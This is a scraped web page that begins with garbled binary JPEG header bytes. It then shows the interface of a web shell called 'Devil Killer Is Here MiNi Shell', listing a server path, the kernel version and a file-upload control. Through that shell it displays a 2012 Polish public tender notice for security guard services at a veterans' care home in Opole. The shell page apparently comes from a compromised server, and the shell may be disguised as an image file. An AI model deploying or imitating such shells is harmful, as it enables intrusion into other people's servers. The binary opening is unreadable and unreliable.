JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121211/262331-N-2012.html

<p class="kh_header"><b>Opole: USŁUGA OCHRONY OSÓB I MIENIA 
W DOMU POMOCY SPOŁECZNEJ DLA KOMBATANTÓW 
 W OPOLU, UL. CHMIELOWICKA 6</b><br>
<b>Numer ogłoszenia: 262331 - 2012; data zamieszczenia: 11.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu , ul. Chmielowicka 6, 45-738 Opole, woj. opolskie, tel. 0-77 4743697, 457 54 95, faks 0-77 4743697, 457 54 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA OCHRONY OSÓB I MIENIA 
W DOMU POMOCY SPOŁECZNEJ DLA KOMBATANTÓW 
 W OPOLU, UL. CHMIELOWICKA 6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest:
ochrona fizyczna Domu Pomocy Społecznej dla Kombatantów w Opolu, ul. Chmielowicka 6, 45-738 Opole polegająca na ochronie osób i mienia Domu Pomocy Społecznej dla Kombatantów   wraz z parkingiem i garażem poprzez sprawowanie bezpośredniej ochrony fizycznej u Zamawiającego z siedzibą  przy ul. Chmielowicka 6, w Opolu na warunkach określonych w szczegółowym  opisie przedmiotu zamówienia zawartym we  wzorze umowy stanowiącym załącznik do specyfikacji istotnych warunków zamówienia.

Wykonawca w ramach przedmiotu zamówienia zobowiązany jest do świadczenia ciągłej usługi fizycznej ochrony osób i mienia, zgodnie ze wskazaniami Zamawiającego, i  wewnętrznymi regulacjami oraz  instrukcjami Zamawiającego. Uprawnienia pracowników ochrony uregulowane są w Rozporządzeniach Rady Ministrów opublikowanych w  Dz. U. Nr 144 poz 933,  Dz.U Nr 120 poz 780, Dz.U. nr 86 poz. 543 i Dz,. U. Nr 89 poz 563  z dnia 30 czerwca 1998 r. 

Ochrona fizyczna obiektu realizowana będzie w trybie 16 godzinnym przez 5 dni tygodnia w dni powszednie i i 24 godzinnym w dni wolne od pracy ( świąteczne) przez odpowiednio ubranego pracownika ochrony stacjonarnej (jednego pracownika na zmianie)  przygotowanego  zawodowo do wykonywania czynności ochronnych  z minimum 2 letnim stażem pracy w zakresie  przewidzianym  do wykonywania usługi ochrony osób i mienia,  bez wymogu posiadania licencji przez  szeregowych pracowników ochrony , oraz minimum jedną osobę  nadzorującą   pracowników wykonujących ww. usługę ochrony w obiekcie  Zamawiającego  posiadających  licencję I lub II stopnia w rozumieniu przepisów ustawy z dnia 22 sierpnia 1997 r o ochronie osób i mienia ( Dz. U. Z 2005 r, Nr 145 poz.1221 ze zmianami). Wymagana  liczba pracowników ochrony stacjonarnej przewidywanej do pracy zmianowej minimum 4 osoby zgodnie z harmonogramem pracy w danym miesiącu. 

Zamawiający wymaga od Wykonawcy obsady posterunku w ochranianym  budynku w systemie dwuzmianowym tj. dla ochrony w dni powszednie zmiana co 8 godzin, dla ochrony w dni wolne od pracy ( świąteczne)  zmiana co 12 godzin. 

Wielkość przedmiotu zamówienia w okresie od  dnia 31.12.2012 od godz. 15 ; 00 
do dnia  31.12.2013 do godz. 15:00:

Posterunek 16 godz w dni robocze od godz 15:00 do 7:00  
 zamawiana ilość roboczogodzin wynosi 4046. 

Posterunek 24 godz. w dni świąteczne i wolne od pracy 
zamawiana ilość roboczogodzin wynosi 2736.

Zamawiana  ilość roboczogodzin usługi w okresie realizacji przedmiotu zamówienia będzie wynikać z bieżących potrzeb Zamawiającego i może ulec zmniejszeniu  do  1%   wszystkich zamawianych roboczogodzin.


Wykonawca zobowiązany jest zapewnić łączność radiową w budynku Domu Pomocy Społecznej dla Kombatantów ul. Chmielowicka 6, 45-738 Opole poprzez urządzenia radiowe pracujące w radiokomunikacji, zapewniające łącze ruchome lądowe pomiędzy pracownikiem pełniącym posterunek w siedzibie Zamawiającego, a zewnętrznym stanowiskiem kierowania i kontroli pracowników ochrony.
Zamawiający wymaga od Wykonawcy zapewnienia  wszystkim swoim pracownikom chroniącym obiekt Zamawiającego własne środki łączności radiowej działające na wydzielonym dopuszczonym do użycia przez właściwą instytucję paśmie , zapewni wysoki poziom ich dyspozycyjności i wszelkie inne środki w ilościach gwarantujących prawidłową realizację zamówienia :łączność telefoniczną za pomocą telefonów komórkowych, kieszonkowe przyciski (piloty  anty - napadowe ). 

Zamawiający wymaga by w pomieszczeniu dyżurki pielęgniarek była zapewniona   łączność radiowa z minimum jedną pielęgniarką wyposażoną w minimum jedną sztuką urządzenia anty napadowego.

Wykonawca składając ofertę winien uwzględnić w niej kalkulację wszystkich kosztów związanych z uruchomieniem pasma radiowego w urządzeniu do transmisji zagrożeń drogą radiową.  Po zakończeniu czasu trwania umowy na ochronę osób i mienia Wykonawca może zdemontować zainstalowane urządzenia i zabrać gdyż nie są one własnością Zamawiającego. Wykonawca jednocześnie udostępni numery telefonów (kontaktowe), które posłużą do bezpośredniej komunikacji z osobami odpowiedzialnymi za ochronę obiektu w oparciu o system telefonii komórkowej 
Wykonawca zobowiązany jest w szczególności do :	wykonywania ochrony zdrowia i życia mieszkańców domu oraz mienia DPS dla Kombatantów  przed kradzieżą, rabunkiem, zniszczeniem; ochrony i zabezpieczenia obiektu przed przedostaniem się na teren DPS dla Kombatantów osób nieupoważnionych; kontroli ruchu osobowego i towarowego, oraz środków transportu przez bramę i wejście główne do DPS dla Kombatantów ; zwracania szczególnej uwagi na mieszkańców domu, którzy często oddalają się od DPS, na inne osoby obce przebywające na terenie Domu, i zgłaszania personelowi domu informacji na temat osób spożywających na terenie domu alkohol  lub będących   pod  pod wpływem alkoholu; obsługi - w zakresie niezbędnym  centrali sygnalizacji alarmu pożaru i oddymiania oraz urządzeń technicznych dotyczących sygnalizacji alarmu pożarowego; powiadamianie  w razie zaistnienia zagrożenia straż pożarną, policję, jednostkę monitorującą sygnał pożarowy w obiekcie DPS oraz jednostki ratowniczej i medycznej; likwidowania ewentualnych ognisk pożarów na terenie chronionego obiektu przy pomocy sprzętu będącego na wyposażeniu DPS dla Kombatantów w Opolu; 	niezwłocznego powiadamiania odpowiednich służb o awariach związanych z funkcjonowaniem urządzeń technicznych, uszkodzeniem instalacji (alarmowych, elektrycznych, wodnej, kanalizacyjnej, itp.) lub innych zdarzeniach powodujących zagrożenie bezpieczeństwa lub ciągłości pracy Zamawiającego; 	prowadzenia stosownej dokumentacji (Książka służb - Dziennik zmiany)  z wpisami dotyczącymi danych personalnych pracowników wykonujących usługę, przebiegiem służby (w tym godziny obchodów) i wszystkich ważnych zdarzeń na terenie obiektów - w sposób ciągły i chronologiczny . Wpisów do ww.Książki -Dziennika mogą również dokonywać upoważnieni przedstawiciele DPS dla Kombatantów w Opolu i Wykonawcy usługi. Wypełnioną książkę z przebiegiem służby ochrony osób i mienia w formie oryginału Wykonawca ma obowiązek oddać Zamawiającemu  nie później niż w ostatnim dniu każdego kwartału; przechowywania i przyjmowania, oraz wydawania kluczy do pomieszczeń upoważnionym pracownikom DPS Dla Kombatantów , przechowywania zapasowych kluczy od mieszkań  i potwierdzania każdorazowo tych czynności w stosownej ewidencji; niezwłocznego powiadamiania Zamawiającego w razie usiłowania dokonania lub dokonania kradzieży, włamania, napadu, dewastacji mienia, ataku terrorystycznego lub innego czynu przestępczego na osobach lub mieniu znajdujących się na terenie objętym zakresem wykonywanej usługi; 	niezwłocznego powiadamiania Zamawiającego w razie zaistnienia nieszczęśliwego wypadku, awarii sieci gazowej, wodno -kanalizacyjnej, CO lub pożaru, czy też stwierdzenia próby podpalenia na terenie objętym zakresem wykonywanej usługi oraz równoczesne powiadomienie odpowiednich miejskich służb ratowniczych; 	niezwłocznego powiadamiania Zamawiającego o niemożności wykonania obowiązków umownych lub ich części wraz z podaniem przyczyny takiego stanu; 	współdziałaniu z personelem medycznym przy udzielaniu pierwszej pomocy w nagłych wypadkach;  	doraźnej pomocy przy transportowaniu, przemieszczaniu mieszkańców wymagających takiej pomocy; obsłudze centrali telefonicznej z przywołaniem mieszkańców do telefonu; 	dozorowaniu wszelkich imprez plenerowych odbywających się na terenie DPS dla Kombatantów; 	zamykaniu furtek i bram prowadzących na teren DPS dla Kombatantów o godz.22:00, otwieranie o godz. 6:00, lub w porozumieniu z kierownictwem zamawiającego, otwieranie bram dla samochodów zaopatrzenia na kuchnię, dbałości o przestrzeganie zakazu wjazdu pojazdów na teren DPS dla Kombatantów w Opolu; 	podejmowaniu doraźnych działań zapobiegających nadmiernemu zużyciu energii, min.: gaszenie niepotrzebnych świateł, zamykanie drzwi i okien, zakręcanie cieknących kranów, spłuczek itp.; 	monitorowaniu  wskazań temperatury w urządzeniach : mroźnia i chłodnia na Kuchni DPS dla Kombatantów , oraz  sprawdzanie wyłączenia po zakończeniu pracy Kuchni urządzeń gazowych; 	podejmowaniu innych czynności niezbędnych do ochrony osób i mienia, które wynikną w trakcie realizacji umowy ; 	zapewnienia na własny koszt w okresie tygodnia przed przejęciem zadań ochronnych, skierowania wyznaczonych pracowników, celem zapoznania się ze specyfiką obiektów i płynnego przejęcia ochrony we wskazanym terminie ; 	zapewnienie  wsparcia posterunku ochrony udziałem grupy interwencyjnej i  każdorazowego stawienia się na wezwanie w ciągu max. 15min. licząc od chwili zgłoszenia, oraz  prowadzenie patroli prewencyjnych na terenie siedziby Zamawiającego (teren wewnętrzny i zewnętrzny  ) min. 1 jeden raz dziennie  w godzinach między 16 :00 - 6:00 
Budynek Domu Pomocy Społecznej dla Kombatantów  jest obiektem użyteczności publicznej  o powierzchni ok. 4 539 m2, trzy  kondygnacyjny, położony na terenie ogrodzonym, oświetlonym, działce o powierzchni ok. 19365 m2. Budynek składa się z części mieszkalnej, biurowej, szpitalnej, pomieszczeń pralni, kuchni, magazynów, gabinetów zabiegowych i innych pomieszczeń do fizjoterapii i terapii zajęciowej. 
Zamawiający udostępni Wykonawcy na swoim terenie nieodpłatnie: pomieszczenie na posterunek  znajdujące się w budynku głównym na parterze w obrębie klatki schodowej K2, do  samodzielnego wyposażenia tego pomieszczenia. Koszt wyposażenia pomieszczenia portierni  ponosi Wykonawca.  	Jednocześnie Zamawiający zobowiązuje Wykonawcę do bezwzględnego dostosowania się do  	postanowień strażaka  dotyczących  wyposażenia i wystroju tego pomieszczenia. W związku z usytuowaniem  przestrzeni portierni na poziomie parteru  i włączeniu  w przestrzeń 	wydzielonej pożarowo klatki schodowej , pomieszczenie portierni  nie może być wyposażone w 	meble i wystrój z materiałów palnych, zakazuje się używania urządzeń elektrycznych takich jak 	czajnik, słoneczko, termowentylator itp. 
Elementy wystroju wnętrza  muszą być wykonane  z materiałów  niepalnych : np.  meble z płyt 	kamiennych, z elementów stalowych. 
Wykonawca bez zgody Zamawiającego wyrażonej na piśmie nie może dokonywać istotnych zmian, ani ulepszeń pomieszczenia portierni lub przedsionka przed wejściem do portierni. Oprócz pisemnej zgody Zamawiającego wymagane jest również uzyskanie pisemnych uzgodnień z Opolskim Komendantem Wojewódzkim Państwowej Straży Pożarnej. Stałe elementy wykończeniowe, ulepszające lub instalacyjne wykonane przez Wykonawcę w pomieszczeniu portierni,  lub przedsionka przed wejściem do portierni, które są na trwale z nim związane, stanowią część składową  pomieszczenia w budynku. Po zakończeniu wykonywania przedmiotu zamówienia  Wykonawca nie ma  prawa odłączenia i zabrania urządzeń, ulepszeń i instalacji wykonywanych przez niego w  pomieszczeniu, jeżeli te urządzenia, ulepszenia i instalacje stały się częścią składową pomieszczenia. Nakłady inwestycyjne z chwilą ich powstania zwiększające  wartość pomieszczenia Wykonawca przekaże nieodpłatnie Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć aktualną (ważną) koncesję wydaną na podstawie ustawy z dnia 
22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r., Nr 145 poz. 1221 z późn. zm.) na prowadzenie działalności gospodarczej w zakresie usług  ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej 
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców (np.: Konsorcjum, Spółki Cywilnej) o udzielenie niniejszego zamówienia w/w warunek musi być spełniony łącznie przez wszystkich Wykonawców występujących wspólnie. Zamawiający nie dopuszcza możliwości powoływania się przez Wykonawcę na koncesję podwykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich trzech lat 	przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje 	(w przypadku świadczeń okresowych lub ciągłych) minimum dwa  zamówienia (usługi) polegające na ochronie fizycznej  placówki zapewniającej całodobową opiekę ludziom którzy tej opieki wymagają z powodu wieku lub  choroby lub niepełnosprawności. 
Dla wskazanych zamówień Wykonawca zobowiązany jest przedłożyć dokumenty  potwierdzające, że usługi zostały wykonane należycie lub są wykonywane (w przypadku świadczeń okresowych lub ciągłych) należycie .W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców (np.: Konsorcjum, Spółki Cywilnej) o udzielenie niniejszego zamówienia oceniane będą łącznie wiedza i doświadczenie. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć  wykaz wykonanych/wykonywanych usług gdzie Wykonawca zobowiązany jest wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje ( w przypadku świadczeń okresowych lub ciągłych) minimum dwa  zamówienia (usługi) polegające na ochronie fizycznej  placówki zapewniającej całodobową opiekę ludziom którzy tej opieki wymagają z powodu wieku lub  choroby lub niepełnosprawności w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia dzielności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców usługi sporządzony na formularzu lub według formularza stanowiącego załącznik   do SIWZ oraz załączyć dokumenty (opinie, referencje) potwierdzające, że te usługi zostały wykonane należycie lub są wykonywane należycie.  Z   treści  załączonych do oferty dokumentów musi wynikać jednoznacznie że  Wykonawca ww. warunek spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania przez Wykonawcę  odpowiednim potencjałem technicznym  do wykonywania zamówienia Zamawiający sprawdzi na podstawie 	złożonych  przez Wykonawcę wraz z ofertą   dokumentów  potwierdzających :

a)	posiadanie  możliwości korzystania z pasma radiowego tj. ważnego  	zezwolenia na użytkowanie odpowiedniego pasma częstotliwości w łączności 	radiowej  - kserokopia potwierdzona za zgodność z oryginałem.								
b)	posiadanie  całodobowej  gotowości  do podjęcia działań  przez grupę patrolowo - interwencyjną, która na sygnalizowane zadziałanie alarmu podejmie czynności ujęcia ewentualnego sprawcy (napadu, włamania, penetracji) i przekazania go Policji. Zamawiający  z uwagi na rozmiar obiektu , powierzchnię terenu  oraz szczególny charakter obiektu w którym zamieszkują osoby starsze i chore  wymaga od Wykonawcy wsparcia w działaniach pracowników ochrony, poprzez reakcję grupy interwencyjnej, która w czasie do 15 min. od wezwania przez służbę dyżurną obiektu poprzez przycisk napadowy do niezależnego centrum monitorowania alarmów, podejmie działania, w celu wsparcia posterunków ochronnych, w przypadku ich zagrożenia lub sytuacji kryzysowych. Zamawiający sprawdzi ten warunek poprzez jednokrotne przykładowe  przywołanie grupy  interwencyjnej   z użyciem  danych  teleadresowych   Wykonawcy ubiegającego się o 	udzielenie przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania przez Wykonawcę  osobami zdolnymi do wykonywania zamówienia Zamawiający sprawdzi na podstawie 	złożonych  przez Wykonawcę wraz z ofertą   dokumentów  potwierdzających :
dysponowanie personelem zatrudnionym  na podstawie umowy o pracę,  minimum 4 osoby  	mające kwalifikacje dla wykonania przedmiotowego zamówienia z minimum dwuletnim 	stażem pracy w zakresie ochrony osób i mienia bez wymogu posiadania licencji i minimum 	jednej osoby nadzorującej pracowników wykonujących usługę ochrony w obiekcie 	posiadającej licencje I  lub  II  stopnia w rozumieniu przepisów ustawy z dnia 22 sierpnia 	1997 r. o ochronie osób i mienia ( Dz. U. Z 2005 r Nr 45 poz.1221 ze zm.), jednakowo 	umundurowanych, wyposażonych w identyfikatory firmy zawierające: 	zdjęcie, imię i 	nazwisko,  wyposażonych w bezprzewodowe środki łączności i dozwolone prawem  środki 	przymusu bezpośredniego, posiadających aktualne orzeczenia lekarskie o zdolności 	psychofizycznej do wykonywania pracy określonej przez Zamawiającego, legitymujących się 	stosownym poziomem kultury osobistej.
Zamawiający  nie dopuszcza możliwości realizacji przedmiotowego zadania przez osoby z orzeczonym, przez instytucje państwowe do tego powołane stopniem niepełnosprawności.
W rozumieniu ustawy z  dnia 27 sierpnia 1997 r o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych  która obowiązuje od dnia 01 stycznia 1998 r  do osób niepełnosprawnych należą te osoby, których stan fizyczny lub umysłowy trwale lub okresowo utrudnia, ogranicza bądź uniemożliwia zdolności  do wykonywania   pracy  zawodowej. jeżeli uzyskały orzeczenie : -o zakwalifikowaniu przez organ orzekający do jednego z trzech stopni niepełnosprawności ( znaczny, umiarkowany, lekki) ,- o całkowitej lub częściowej niezdolności do pracy	W celu wykazania  spełnienia niniejszego warunku  Wykonawca obowiązany jest przedłożyć 	wykaz osób które uczestniczyć będą w realizacji usługi ochrony u zamawiającego według formularza załączonego  do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomiczno finansowej   do wykonywania zamówienia Zamawiający sprawdzi na podstawie 	złożonego   przez Wykonawcę wraz z ofertą  oświadczenia potwierdzającego spełnienie warunków określonych w art. 22 ust.1 Ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
